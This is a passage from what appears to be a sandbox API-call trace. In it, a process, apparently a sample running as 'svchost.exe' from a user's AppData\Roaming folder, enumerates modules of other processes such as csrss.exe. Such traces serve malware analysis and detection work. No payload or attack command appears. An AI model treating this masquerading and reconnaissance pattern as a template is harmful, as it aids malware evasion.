lpmodinfo=0x258f6c0*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0071.805] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0071.807] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0071.809] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef98a0000, lpmodinfo=0x2591890, cb=0x18 | out: lpmodinfo=0x2591890*(lpBaseOfDll=0x7fef98a0000, SizeOfImage=0x13000, EntryPoint=0x7fef98a1d80)) returned 1 [0071.811] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef98a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wbemsvc.dll") returned 0xb [0071.814] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef98a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")) returned 0x24 [0071.816] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9780000, lpmodinfo=0x2593a60, cb=0x18 | out: lpmodinfo=0x2593a60*(lpBaseOfDll=0x7fef9780000, SizeOfImage=0x21000, EntryPoint=0x7fef97903b0)) returned 1 [0071.818] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9780000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wmiutils.dll") returned 0xc [0071.821] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9780000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")) returned 0x25 [0071.823] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef2980000, lpmodinfo=0x2595e50, cb=0x18 | out: lpmodinfo=0x2595e50*(lpBaseOfDll=0x7fef2980000, SizeOfImage=0x1fa000, EntryPoint=0x7fef2994c9c)) returned 1 [0071.825] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef2980000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="cimwin32.dll") returned 0xc [0071.827] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef2980000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll")) returned 0x25 [0071.830] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef7780000, lpmodinfo=0x2598028, cb=0x18 | out: lpmodinfo=0x2598028*(lpBaseOfDll=0x7fef7780000, SizeOfImage=0x43000, EntryPoint=0x7fef77a1b50)) returned 1 [0071.832] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef7780000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="framedynos.dll") returned 0xe [0071.834] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef7780000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")) returned 0x22 [0071.837] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd640000, lpmodinfo=0x259a1f8, cb=0x18 | out: lpmodinfo=0x259a1f8*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0071.839] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd640000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0071.842] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd640000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0071.844] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbb00000, lpmodinfo=0x259c3b8, cb=0x18 | out: lpmodinfo=0x259c3b8*(lpBaseOfDll=0x7fefbb00000, SizeOfImage=0x11000, EntryPoint=0x7fefbb01070)) returned 1 [0071.846] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbb00000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WTSAPI32.dll") returned 0xc [0071.849] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbb00000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WTSAPI32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")) returned 0x20 [0071.851] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd720000, lpmodinfo=0x259e588, cb=0x18 | out: lpmodinfo=0x259e588*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0071.854] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd720000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0071.857] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd720000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0071.860] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd980000, lpmodinfo=0x25a0748, cb=0x18 | out: lpmodinfo=0x25a0748*(lpBaseOfDll=0x7fefd980000, SizeOfImage=0x1a000, EntryPoint=0x7fefd981558)) returned 1 [0071.862] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd980000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="DEVOBJ.dll") returned 0xa [0071.865] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd980000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DEVOBJ.dll" (normalized: "c:\\windows\\system32\\devobj.dll")) returned 0x1e [0071.867] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd9a0000, lpmodinfo=0x25a2908, cb=0x18 | out: lpmodinfo=0x25a2908*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0071.870] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd9a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0071.873] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd9a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0071.875] GetModuleInformation (in: hProcess=0x214, hModule=0x72d10000, lpmodinfo=0x25a4ad8, cb=0x18 | out: lpmodinfo=0x25a4ad8*(lpBaseOfDll=0x72d10000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0071.878] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x72d10000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WMI.DLL") returned 0x7 [0071.881] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x72d10000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WMI.DLL" (normalized: "c:\\windows\\system32\\wmi.dll")) returned 0x1b [0071.884] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb720000, lpmodinfo=0x25a6c88, cb=0x18 | out: lpmodinfo=0x25a6c88*(lpBaseOfDll=0x7fefb720000, SizeOfImage=0x2c000, EntryPoint=0x7fefb7215c4)) returned 1 [0071.886] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb720000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="POWRPROF.dll") returned 0xc [0071.889] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb720000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\POWRPROF.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")) returned 0x20 [0071.892] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdc80000, lpmodinfo=0x25a8e58, cb=0x18 | out: lpmodinfo=0x25a8e58*(lpBaseOfDll=0x7fefdc80000, SizeOfImage=0x1d7000, EntryPoint=0x7fefdc81010)) returned 1 [0071.895] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdc80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SETUPAPI.dll") returned 0xc [0071.898] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdc80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SETUPAPI.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")) returned 0x20 [0071.901] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb9d0000, lpmodinfo=0x25ab028, cb=0x18 | out: lpmodinfo=0x25ab028*(lpBaseOfDll=0x7fefb9d0000, SizeOfImage=0x16000, EntryPoint=0x7fefb9d11a0)) returned 1 [0071.904] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb9d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="NETAPI32.DLL") returned 0xc [0071.906] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb9d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NETAPI32.DLL" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0071.909] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb9c0000, lpmodinfo=0x25ad210, cb=0x18 | out: lpmodinfo=0x25ad210*(lpBaseOfDll=0x7fefb9c0000, SizeOfImage=0xc000, EntryPoint=0x7fefb9c18a4)) returned 1 [0071.912] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb9c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="netutils.dll") returned 0xc [0071.915] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb9c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")) returned 0x20 [0071.918] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd570000, lpmodinfo=0x25af3e0, cb=0x18 | out: lpmodinfo=0x25af3e0*(lpBaseOfDll=0x7fefd570000, SizeOfImage=0x23000, EntryPoint=0x7fefd571198)) returned 1 [0071.921] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd570000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="srvcli.dll") returned 0xa [0071.924] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd570000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")) returned 0x1e [0071.927] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb9a0000, lpmodinfo=0x25b15a0, cb=0x18 | out: lpmodinfo=0x25b15a0*(lpBaseOfDll=0x7fefb9a0000, SizeOfImage=0x15000, EntryPoint=0x7fefb9a1050)) returned 1 [0071.930] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb9a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wkscli.dll") returned 0xa [0071.933] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb9a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")) returned 0x1e [0071.937] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb980000, lpmodinfo=0x25b3760, cb=0x18 | out: lpmodinfo=0x25b3760*(lpBaseOfDll=0x7fefb980000, SizeOfImage=0x14000, EntryPoint=0x7fefb9816b4)) returned 1 [0071.940] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb980000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SAMCLI.DLL") returned 0xa [0071.943] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb980000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SAMCLI.DLL" (normalized: "c:\\windows\\system32\\samcli.dll")) returned 0x1e [0071.946] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefce60000, lpmodinfo=0x25b5920, cb=0x18 | out: lpmodinfo=0x25b5920*(lpBaseOfDll=0x7fefce60000, SizeOfImage=0x30000, EntryPoint=0x7fefce6194c)) returned 1 [0071.949] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefce60000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="LOGONCLI.DLL") returned 0xc [0071.952] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefce60000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LOGONCLI.DLL" (normalized: "c:\\windows\\system32\\logoncli.dll")) returned 0x20 [0071.956] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef2960000, lpmodinfo=0x25b7af0, cb=0x18 | out: lpmodinfo=0x25b7af0*(lpBaseOfDll=0x7fef2960000, SizeOfImage=0x12000, EntryPoint=0x7fef296aab8)) returned 1 [0071.959] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef2960000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="BROWCLI.DLL") returned 0xb [0071.962] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef2960000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\BROWCLI.DLL" (normalized: "c:\\windows\\system32\\browcli.dll")) returned 0x1f [0071.972] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3250000, lpmodinfo=0x25b9cb0, cb=0x18 | out: lpmodinfo=0x25b9cb0*(lpBaseOfDll=0x7fef3250000, SizeOfImage=0xa000, EntryPoint=0x7fef32531c8)) returned 1 [0071.975] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3250000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SCHEDCLI.DLL") returned 0xc [0071.978] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3250000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SCHEDCLI.DLL" (normalized: "c:\\windows\\system32\\schedcli.dll")) returned 0x20 [0071.983] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb330000, lpmodinfo=0x25bbe80, cb=0x18 | out: lpmodinfo=0x25bbe80*(lpBaseOfDll=0x7fefb330000, SizeOfImage=0xc000, EntryPoint=0x7fefb3315d8)) returned 1 [0071.987] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb330000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="DSROLE.DLL") returned 0xa [0071.990] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb330000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DSROLE.DLL" (normalized: "c:\\windows\\system32\\dsrole.dll")) returned 0x1e [0071.994] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef28d0000, lpmodinfo=0x25be040, cb=0x18 | out: lpmodinfo=0x25be040*(lpBaseOfDll=0x7fef28d0000, SizeOfImage=0x8000, EntryPoint=0x7fef28d11a0)) returned 1 [0071.997] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef28d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINBRAND.dll") returned 0xc [0072.001] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef28d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINBRAND.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")) returned 0x20 [0072.004] GetModuleInformation (in: hProcess=0x214, hModule=0x72d00000, lpmodinfo=0x25c0210, cb=0x18 | out: lpmodinfo=0x25c0210*(lpBaseOfDll=0x72d00000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0072.008] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x72d00000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SECURITY.DLL") returned 0xc [0072.011] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x72d00000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SECURITY.DLL" (normalized: "c:\\windows\\system32\\security.dll")) returned 0x20 [0072.015] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd610000, lpmodinfo=0x25c23e0, cb=0x18 | out: lpmodinfo=0x25c23e0*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0072.018] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SECUR32.DLL") returned 0xb [0072.022] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SECUR32.DLL" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0072.025] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcc70000, lpmodinfo=0x25c45a0, cb=0x18 | out: lpmodinfo=0x25c45a0*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0072.029] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcc70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0072.033] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcc70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0072.036] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefce00000, lpmodinfo=0x25c6760, cb=0x18 | out: lpmodinfo=0x25c6760*(lpBaseOfDll=0x7fefce00000, SizeOfImage=0x57000, EntryPoint=0x7fefce05e38)) returned 1 [0072.040] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefce00000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="schannel.DLL") returned 0xc [0072.044] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefce00000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\schannel.DLL" (normalized: "c:\\windows\\system32\\schannel.dll")) returned 0x20 [0072.048] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd9e0000, lpmodinfo=0x25c8930, cb=0x18 | out: lpmodinfo=0x25c8930*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0072.052] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd9e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0072.055] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd9e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0072.059] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd820000, lpmodinfo=0x25caaf0, cb=0x18 | out: lpmodinfo=0x25caaf0*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0072.063] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd820000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0072.067] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd820000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0072.071] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb0e0000, lpmodinfo=0x25cccb0, cb=0x18 | out: lpmodinfo=0x25cccb0*(lpBaseOfDll=0x7fefb0e0000, SizeOfImage=0xf000, EntryPoint=0x7fefb0e1040)) returned 1 [0072.075] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb0e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="cscapi.dll") returned 0xa [0072.079] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb0e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")) returned 0x1e [0072.082] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd830000, lpmodinfo=0x25cee70, cb=0x18 | out: lpmodinfo=0x25cee70*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0072.086] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0072.090] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0072.094] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6cf0000, lpmodinfo=0x25d1040, cb=0x18 | out: lpmodinfo=0x25d1040*(lpBaseOfDll=0x7fef6cf0000, SizeOfImage=0x2c000, EntryPoint=0x7fef6d08194)) returned 1 [0072.098] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6cf0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wmipcima.dll") returned 0xc [0072.103] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6cf0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wmipcima.dll" (normalized: "c:\\windows\\system32\\wbem\\wmipcima.dll")) returned 0x25 [0072.110] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0072.110] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x154) returned 0x214 [0072.110] EnumProcessModules (in: hProcess=0x214, lphModule=0x25d4ad8, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x25d4ad8, lpcbNeeded=0x23ee40) returned 1 [0072.112] GetModuleInformation (in: hProcess=0x214, hModule=0x4a3d0000, lpmodinfo=0x25d4d48, cb=0x18 | out: lpmodinfo=0x25d4d48*(lpBaseOfDll=0x4a3d0000, SizeOfImage=0x6000, EntryPoint=0x4a3d1540)) returned 1 [0072.112] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x4a3d0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="csrss.exe") returned 0x9 [0072.112] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x4a3d0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\csrss.exe" (normalized: "c:\\windows\\system32\\csrss.exe")) returned 0x1d [0072.113] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x25d6f40, cb=0x18 | out: lpmodinfo=0x25d6f40*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0072.113] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0072.118] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.118] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0072.119] CoTaskMemFree (pv=0xd956b0) [0072.119] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd800000, lpmodinfo=0x23e5a78, cb=0x18 | out: lpmodinfo=0x23e5a78*(lpBaseOfDll=0x7fefd800000, SizeOfImage=0x13000, EntryPoint=0x7fefd807c30)) returned 1 [0072.119] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.119] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd800000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="CSRSRV.dll") returned 0xa [0072.120] CoTaskMemFree (pv=0xd956b0) [0072.120] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.120] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd800000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CSRSRV.dll" (normalized: "c:\\windows\\system32\\csrsrv.dll")) returned 0x1e [0072.121] CoTaskMemFree (pv=0xd956b0) [0072.121] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd7e0000, lpmodinfo=0x23e7c38, cb=0x18 | out: lpmodinfo=0x23e7c38*(lpBaseOfDll=0x7fefd7e0000, SizeOfImage=0x11000, EntryPoint=0x7fefd7eb1ec)) returned 1 [0072.121] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.121] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd7e0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="basesrv.DLL") returned 0xb [0072.122] CoTaskMemFree (pv=0xd956b0) [0072.122] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.122] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd7e0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\basesrv.DLL" (normalized: "c:\\windows\\system32\\basesrv.dll")) returned 0x1f [0072.123] CoTaskMemFree (pv=0xd956b0) [0072.123] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd7a0000, lpmodinfo=0x23e9df8, cb=0x18 | out: lpmodinfo=0x23e9df8*(lpBaseOfDll=0x7fefd7a0000, SizeOfImage=0x38000, EntryPoint=0x7fefd7a27c0)) returned 1 [0072.123] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.123] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd7a0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="winsrv.DLL") returned 0xa [0072.124] CoTaskMemFree (pv=0xd956b0) [0072.124] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.124] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd7a0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\winsrv.DLL" (normalized: "c:\\windows\\system32\\winsrv.dll")) returned 0x1e [0072.125] CoTaskMemFree (pv=0xd956b0) [0072.125] GetModuleInformation (in: hProcess=0x214, hModule=0x77610000, lpmodinfo=0x23ec010, cb=0x18 | out: lpmodinfo=0x23ec010*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0072.126] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.126] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77610000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0072.126] CoTaskMemFree (pv=0xd956b0) [0072.126] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.126] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77610000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0072.127] CoTaskMemFree (pv=0xd956b0) [0072.127] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff1c0000, lpmodinfo=0x23ee1d0, cb=0x18 | out: lpmodinfo=0x23ee1d0*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0072.128] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.128] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff1c0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0072.129] CoTaskMemFree (pv=0xd956b0) [0072.129] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.129] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff1c0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0072.130] CoTaskMemFree (pv=0xd956b0) [0072.130] GetModuleInformation (in: hProcess=0x214, hModule=0x77710000, lpmodinfo=0x23f0390, cb=0x18 | out: lpmodinfo=0x23f0390*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0072.131] CoTaskMemAlloc (cb=0x804) returned 